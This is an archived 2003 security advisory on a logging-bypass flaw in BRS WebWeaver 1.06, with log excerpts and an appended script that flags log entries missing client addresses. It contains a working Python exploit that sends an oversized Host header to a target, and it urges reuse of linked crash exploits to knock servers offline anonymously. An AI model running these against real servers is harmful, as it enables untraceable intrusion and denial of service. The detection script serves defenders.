BRSwebweaver.txt

Date: 25 Sep 2003 00:00:00 | Reported by: euronymous | Type: packetstorm | Source: packetstormsecurity.com

BRS WebWeaver 1.06 allows anonymous surfing due to a logging bypass vulnerability, high risk.

Code
`=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=  
topic: BRS WebWeaver: Anonymous Surfing  
product: BRS WebWeaver 1.06  
vendor: http://www.brswebweaver.com  
risk: high  
date: 09/24/2k3  
discovered by: euronymous /F0KP   
advisory urls: http://f0kp.iplus.ru/bz/027_en  
http://f0kp.iplus.ru/bz/027_ru   
contact email: euronymous at iplus dot ru  
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=  
  
0x01. Anonymous surfing  
=======================  
  
WebWeaver 1.06 and probably prior versions allow 'anonymous surfing' with a  
simple trick. If you send the HTTP server a request with a long 'Host' header  
field, WebWeaver does not log your IP address in the server log:  
  
HTTP Server Started - 24/Sep/2003:18:13:39  
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-"  
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-"  
- - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-"  
- - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-"  
- - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"  
  
  
HTTP server response:  
---------------------   
  
HTTP/1.0 414 Request-URI Too Large  
Sever: BRS WebWeaver/1.06  
Date: Wed, 24 Sep 2003 14:16:11 GMT  
Content-Type: text/html  
  
<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request  
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi  
s server.</BODY></HTML>  
  
  
Exploit code:  
-------------  
  
#! /usr/bin/env python  
##  
# by euronymous [ http://f0kp.iplus.ru ]  
#  
# Usage: ./WWanon.py <target_host>  
##  
  
import sys, socket  
  
H0ST = sys.argv[1]  
BUF = 'fp' * 0x815F  
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
f.connect((H0ST,80))  
f.send('GET / HTTP/1.1\r\n')  
f.send('Host: '+BUF+'\n\n')   
WWout = f.recv(1024)  
f.close()  
print WWout  
  
  
0x02. Remote crashes again  
==========================  
  
The WW author was unable to fix the earlier overflow conditions in his crappy  
proggie; he just increased the vulnerable buffer size. Therefore, you can still  
crash any WW instance with the exploits released earlier, but you have to change  
the size of the request in the exploit code. Using the technique mentioned  
above, you can DoS anonymously.  
  
Exploit urls:  
  
[1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request.  
[2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST  
  
  
0x03. Greetings  
===============  
  
Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..  
  
`
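
A defender-side check for the symptom shown in the advisory's log excerpt, as an added example that is not part of the original advisory: it scans an access log in that format for entries whose client-address field is missing. The regular expression and function names are assumptions made for this example; the sample lines are the ones quoted in the advisory.

```python
import re
from collections import Counter

# Sample input: the log excerpt quoted in the advisory, embedded so this runs offline.
SAMPLE_LOG = """\
HTTP Server Started - 24/Sep/2003:18:13:39
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-"
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-"
- - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"
"""

# Assumed layout: [host] - - [timestamp] "request" status ...
# The host field is optional here because the affected entries omit it entirely.
ENTRY = re.compile(
    r'^(?:(?P<host>\S+) )?- - \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

def find_unattributed(log_text):
    """Return (line_no, timestamp, status, request) for entries with no client address."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = ENTRY.match(line.strip())
        if m is None:
            continue  # banner lines such as "HTTP Server Started"
        if m["host"] in (None, "-"):
            hits.append((line_no, m["ts"], int(m["status"]), m["req"]))
    return hits

def summarize(hits):
    """Count unattributed entries per HTTP status code."""
    return Counter(status for _, _, status, _ in hits)

if __name__ == "__main__":
    found = find_unattributed(SAMPLE_LOG)
    for line_no, ts, status, req in found:
        print(f"line {line_no}: no source address at {ts}, status {status}, {req!r}")
    print(dict(summarize(found)))
```

Because the server log itself carries no address for these entries, the timestamps it reports are what to correlate against firewall, NetFlow or reverse-proxy logs to recover the source.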
